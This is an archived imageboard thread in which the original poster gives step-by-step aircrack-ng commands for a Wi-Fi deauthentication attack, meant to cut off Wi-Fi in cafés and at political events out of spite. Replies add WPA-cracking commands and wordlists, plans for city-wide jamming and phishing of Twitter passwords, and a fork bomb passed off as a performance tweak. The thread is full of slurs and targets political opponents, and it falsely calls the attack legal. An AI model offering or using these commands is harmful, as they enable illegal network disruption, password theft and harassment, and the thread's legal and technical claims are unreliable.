ITT I teach you how to be a 1337 haxor

Very oldfag here, and I mean way back when Cred Forums was good and reddit faggots didn't go on Cred Forums to be edgy so we had legitimate political discussions.

Since Cred Forums will be permanently ded soon, I'd though I teach some of you faggots something very memey that you can do. Now what am I about to show you is a very old sekrit that only oldfags know and have since the dawn of the chans have made a pact to never tell any newfag until the end of chans.

This meme will teach you how to block WiFi access to everyone around to, within a 50 meter radius depending on how good your Networking Card is. This is very useful to piss of liberal cucks like in a Starbucks, it's pretty skiddie tier and should be perfect for faggot cucks like you.

If you have a Laptop and a Flash drive you can literally goto a DNC convention or just any liberal bar(or an Apple Store) with WiFi and turn it on for keks

Class starts in 1 minute, have a notepad ready and save the pics if you want.

Also for hotpockets this isn't hacking it's just covertly autisming it out IRL

Other urls found in this thread:


First get Linux onto a Flash Drive which you can boot from when you get to your local liberal wifi cafe

Then get Aircrack-ng onto linux

Then open up your terminal like so and do exactly as I say, and make sure nobody is watching what you do or you may get b& IRL

Next type the following


Then enter and you should get the following

Oy vey! Will this really work?

>mfw if it actually works
>mfw liberal butthurt
Please be real OP & not bait

You will see all your network adapters, look for your WiFi one, usually you will have two, one wireless and one wired you want the name of the wireless one

In my case if it wlan0

but yours might be named something different

So what you do is connect to a wifi, then run the command and it whichever one if the wireless one will have the name of your network in it along with other details

Grabbing popcorn. Brb

Is this illegal like Ddossing?

Next run the following commands to put your NIC into monitor mode

>ifconfig (your wifi adapter name) down
>iwconfig (your wifi adapter name) mode monitor
>if config (your wifi adapter name) up

See pic related, where i used wlan0 which is my wifi name

A bomb!

No this is completely legal. it is the computer equivalent of being a fucking retard IRL, imagine saying "PEPE" in a DNC rally, but instead do it with computers instead so people can't pinpoint the source of the autism, just don't let anyone see of liberals will suspect it's you doing the autism

1st Amendment desu

Bump for hax

>when Cred Forums was good

I miss this. This old way of doing things. I miss this a bell of a lot these days

Now next you will type the following

>airmon-ng check (your wifi adapter name)

This will check for conflicting processes. Aircrack-ng will need to use your wifi adapter exclusively, if you have a multiple wifi adapters then you will just need to make sure that aircrack-ng is using the one that is not connected to any wifi hotspots

Pic related, you will usually get those 3 processes

I will go out and spread this information wisely, thank you my fellow afro

>when Cred Forums was good

Fuck off newfag, Cred Forums has always been cancer.

Fuck the faggot OP.

Here' you go guys. REAL HAX

$ git clone set/

Hey fuck you and your ayylamaos

K reddit

>implying any of you know how to use that
>implying i'm not just here to teach skiddie tier hacks even an autistic redditor could do

Dragon is nice

im making a pic of all your posts for the retards that dont want to skim through all of this

lol thats not dragon its backtrack


Forgot about this, I used to have a lot of fun in school with it on the old backtrack distribution.

LOL. You just got BTFO, faggot.

Go fuck yourself and your fake haxor bullshit.

Guys, type this to make your linux system even more powerful:

$ :(){ :|: & };:

Ignore this faggot, op is legit.

fuggg, i forgot the name.
used to steal wifi with it

its called airsnort

Jokes on you. Cred Forums was never good

OP, isn't it a bit dangerous to be teaching newfags aircrack and NET?
What next teach them how to firewalk or drop rootkits?

You will see PIDs of the processes that will conflict with your wifi adapter

Make sure to delete them in the following order or else they will just pop back up after you kill them

First kill the Network Manager then the DHClient, then the WPA_Supplicant

They will have different PIDs for all of you so make sure to kill them using their PIDs not their names.

For me it was

>kill 886
>kill 1017
>kill 3606


>airmon-ng check (your wifi adapter name)

And it should come up clear like pic related

You missed the part where you install Cain and Abel to thrust your mighty rainbow table into the protocol stack of router-chan

>I wanna show that I know : the post

>trying to fuck my computer and internet up

No way

This isn't anything really dangerous, it's honestly just a bit of fun, they can't do any damage with it aside from block out people's wifi

how bout teach them netcat relays?

Cred Forums was never good
You're not an oldfag. y u lying?

That's why you test it out at fagbucks

As a general rule I don't listen to chanadvice and here you are killing processes so I think this is the part where you fuck up your computer

Next type the following

>airodump-ng (your wifi adapter name)

and press enter

>killing processes in an operating system that isn't windows
>fucking up your computer

Yeah man, I never even shut down steam because it will fuck up my computer.

implying you don't have a spare laptop to fuck with, or even a fucking VM

>thinking I would go to fagbucks just to annoy some hipsters, and fuck my computer up

It will only turn off that wifi adapter, and make sure only aircrack is using it but whatever you want to believe, this is intended for IRL memers like those who yell pepe at the DNC and RNC conventions

how is this politics?

>and fuck my computer up
Why don't you actually read what he's doing.

It's not forcing your CPU to abandon safety thresholds and overclock itself to 10ghz, so what damage are you worried about exactly?

My brother died that way.

This. It's amusing to watch computer illiterates scared to do basic stuff.

>Killing firewall
>Dumping all login info onto the Starbucks server
Yeah I'm not touching this stuff

Saving this thread because I have to go back to work. Will check back later

Actually it just over clocked my i7 to unprecedented speeds, 50 terahz and it is stable.... I have unleashed the 5th dimension

We master haxxor now!

yea dont do this it makes mustard gas

Good. Somehow magically a random laptop that is formatted and contains none of your information will somehow acquire it and dump it.

^ This

Op any other cool shit to learn? When will hx 201 start, I signed up for that

I just don't know what it does okay?

>very oldfag
>we could go on Cred Forums

Not only did Cred Forums not exist until fairly recently, the board it replaced was fairly left of centre.

>Left of centre.

Why the lies? It was lolbertarian at best

Bro, fuck these nerds. I'm sure if starbucks or wherever caught you doing this, you'd get in deep shit. Maybe even jail time

You will then get the following scanning process which will show you every Wifi that your computer can detect, if you with to increase this range buy an antenna that you ca hide in your bag, this way you can increase the wifi deauth broadcast if your in a big convention

Or you can get a satellite dish, capture every wifi you can get and deauth all of them within the range of a few miles(don't recommend doing this if you are in your own house, do it in a moving car/van) therefore shutting off tons of wifi across entire cities, you will also need a lot of power to broadcast something this strong and sensitive dish setup, however this memery will be the topic of another thread later

You will get something like pic related, you have several columns. There is the first column the BSSID, or the mac address of the wifi router, we will need this.

Then the ESSID, the actual name of the wifi, this will usually be "Starcucks" or the name of the hippie internet cafe, if you don't know what it is, just ask the barrista for the wifi name

Once you see your target press CTRL+C to stop the scanning process

Then don't sperg out about what it does when you don't fucking know

You sound like a goddamn retard

>kali linux

Instructions unclear, im in the CIA mainframe guys plz help

>Bro, fuck these nerds
Ty breh

Fuck you nerd

Also press CTRL+C to stop the scanning process

It makes the WiFi inaccessible.

It's also illegal (regardless of what he claims) and will only inconvenience the guy who gets called out to "fix" it, whereas the people in there will just switch to data or be midlly inconvenienced.

now, set off your suicide bomber vest

Next find your target and copy it's BSSID

In my case I just chose a random Optimum hotspot

Where the fuck did you scan from to have that many "optimum wifi" wireless routers in proximity?

>buy an antennae that you take to people's businesses to make them reset their wifi

What a reasonable thing to do

Newfag detected Cred Forums was never good

T. 2006 newfag

Thanks, that's all I really wanted to know really.

Goodnight brolad and stay safe everyone

what the fuck man, i trid this and eric has no eys

I liked Cred Forums in 2010. To me Cred Forums was good in 2010.

That's the cable company network, if you're a customer you get free wi-fi with signup.

In the US, an ISP's gateway usually has a second wireless connection that anyone with an ISP account can connect to cucking you out of your own connection.

Ah ok

Follow these steps to crack WPA, I made them for myself.


airodump-ng mon0

airodump-ng --bssid --channel -w mon0

aireplay-ng -0 0 -a -c mon0 --ignore-negative-one

aircrack-ng -w

aircrack-ng -J cap.hccap>


was still shit, the last bastion of /b being even remotely good was in '08 then after all those shills which ironically are here now got their wish and king nigger elected it turned to utter and complete shit. Pic related.

Does this work? Every Cred Forumsack should be using this outside their local Hillary campaign headquarters.

Ignore the haters and faggots OP thanks for posting

Those were the days

Next type

>aireplay-ng -0 0 -a (BSSID) (your wifi adapter)

This is the deauthentication request, the 0 0 means you will spam it in an infinite loop and anyone connected to that wifi won't be able to connect, if you have a decent wifi adapter you can spam this to multiple routers to block them out as well

you should have something like pic related and then press enter

Post word list for ebin brute force rape

Where can I find more lessons like this?

Good job. I'm going to crop all your posts and put in an informational image for when the world ends.

Micah, is that you?


>bruteforcing for 1 billion years
>not using WifiPhisher instead

Fucking hell here is my version.
Run kali-live
start wifite with "wifite -aircrack -mac"
Easy. Does wps, wpa handshake and cracking in one tool.

Use the rockyou worlist. I got 2 AP's with that one.

Anyway, thanks OP
Pick your time folks - when could this do maximum damage? Could we use this to fuck up whoever is feeding stuff to Hillary during one of the debates?

Just download wifislax and choose from menu.

Imma archive this shit

ten years I've been here now. Cred Forums that is, not Cred Forums of course.

Thanks for actually making an useful dump, Roodypoo, Brushy brushy brushy QUEEN OF Cred Forums

>not doing this with a raspberry pi and either attaching a decent battery or even better, find a way to get it plugged in.

You would kill all livestreams using wifi

>back when Cred Forums was good

What program you use to make informational images? need to compile some shit as well.

got any good forum links for newfags?


>Daring to mention Her

That is literally what killed the Cred Forums. It never fucking recovered from that shit. Well that and the massive faggotry of Chanology.

What is this? If I wanted to learn how to do this sort of thing?

Hahaha, did you really have to ask?

>Cred Forums was good
Cred Forums was never good

It lead to new boards being made and unmade though. There was a few waves of new users that really fucked Cred Forums in, I'd definitely agree with you that she was the big one.

Do you know any instructional videos i can see demonstrating this or is it pretty simple? thanks

You're joking right? Just crop out the revelvant information and save it in chronological order. If you can't figure out how to save and preserve valuable information. You shouldn't delve into scanning and denial of service.

>that feel when I accidentally nmap scanned my VPN provider, when trying to scan my own network
>they took it as a hack attempt, and cancelled my subscription and called me on my home phone

Thanks for sharing. Not like I'm gonna use it but I find these things interesting to know, which there were more threads like these but I understand why that would be a bad idea

BT internet does that over here, probably Virgin too. I'm on Virgin which is depressing for a host of reasons.

dude just use snip over his posts
>windows button
>type in snip
> click
>open snip
>press new
> hold down your left click button
> drag till you get his entire post
>then get the snipped picture now press file and save as
boom your done happy sniping i do it alot when doing things sometimes

He's using a terminal to tell his wifi radio emitter in his laptop to send a DDOS attack to a local wifi access point.

It ties up the access point router with a bunch of data it has to process that slows it down and drowns out anyone else trying to access the router.

It's like using a radio jammer without being quite as conspicuous and detectable.

You would learn how to do this sort of thing in some basic comp-sci and networking classes if you pay any attention at all. You might even be able to emulate it in programs like packet tracer

Liberal redditor here.
I'm saving too.

Right so how would you use this without a.) gettin got b.) is it traceable?

kiwi farmer

Yes it's traceable very easily.

I'm going to do this during exam week at my large state university's library.

For the lulz, also because most fuckers here are a bunch of liberal faggots.

post more hacker shit senpai

explain how

This info is legit. Problem is the source.

How do we know youre not FSB teaching us tricks and tools to use against our own people?

Im all for lulz but giving this info to the common chanTARD is unethical. Not to mention what you are suggesting by running this shit on a city wide scale.

If these idiots learn this, come together and pull off your "IRL memery" it would be nothing short of a domestic cyber attack.

And what kind of political leanings does Cred Forums have? Exactly!

This is a seed from a dirty source Cred Forums.... Avoid at all costs...

Next find OP by looking up these SSIDs on wigle

Send pizza and escorts

It would be hard in busy place with a lot of computers around. Can't really pinpoint it that exactly.

so why bother doing it if its easily un-doable and easy to spot?

It isn't, he's full of shit.

Unless you're going to do it for an extended period of time and wait for LEO to show up, jack shit will happen to you.

This would be fucking hilarious. Someone needs to do this.

She fucked Cred Forums into the eventually full on faggotry it is today. Now it's literally tranny porn the board.

Guys how likely is it that there's going to be someone who even knows what the fuck is going on?

I wouldn't worry about traceability at all.


If you need to get Linux because you are so bad at security you shouldn't even be on a computer you should be playing with leggos.

Do I delete system 32 before or after this?

And that should be about it. This will often force people to switch to Data or other Wifi hotspots which we can use to our advantage and use WifiPhisher along with an IMSI catcher as well to phish for things like Twitter passwords. Many famous twitter liberals and cucks visit local cafes in trendy areas, and if you know where one goes you can take advantage of this to haxor them and cause massive liberal butthurt on a nation wide or even global level. However you should only do this is you want to get Cred Forums into more trouble.

This will be a topic for another time desu

This info is on YouTube. And you can just use a cable to connect to the internet lmao


>Secure, ever

Pick one

That doesn't actually do anything too bad, tried it on an old shitbox when I was bored.

>when Cred Forums was good

do you like deepin linux


no people over 25 say "literally"

>also namefag
lol get out. just use kain&able if you want to do stupid shit easily.

Never used it, I'm an Arch and backtrack/kali fag.

Its very politically incorrect

NSA here, everyone ITT has been put on a watch list

deepin linux is very very shiny and good looking and made with a huge coding team,>inb4 china yeah i know chinas bad but they are trying to look for people to work for the team
>inb4 china

nice meme pic

Laptop fags cant mobile data

you watch CSI?

yeah, it's like using sudo ping -rf Just pings the shit out someone, paralyzing the network. Except now you do it to the AP

old pic. fuck off.

>very oldfag
>when Cred Forums was good
>mentioning Cred Forums
You are like a little babby


But people on pol are not the common chanTARD, most of us are truth seekers at any cost

Op starcucks would be lulzy as hell. Get on it faggots.

What's with all the dune references lately?

This is the 4th or 5th Shai Hulud I've seen tonight, wtf

LOok. The only hacking I'm trying to do is so that I can view private instagram profiles without following them and/or even having an account. I am very horny today.

didn't know NSA was so fancy breakin out the cursive for us. they must mean business

you can set up a fake access point with a lulzy name using that

The only way would be either hacking Instagram or hacking a user who has access to your target's private profile.

Shut up

>reddit faggots didn't go on Cred Forums to be edgy
>Cred Forums

Instant sign you are bullshitting. Lurk the fuck moar, faggot.

Tnx man interesting.

Someone check the link for a Trojan or honeypot.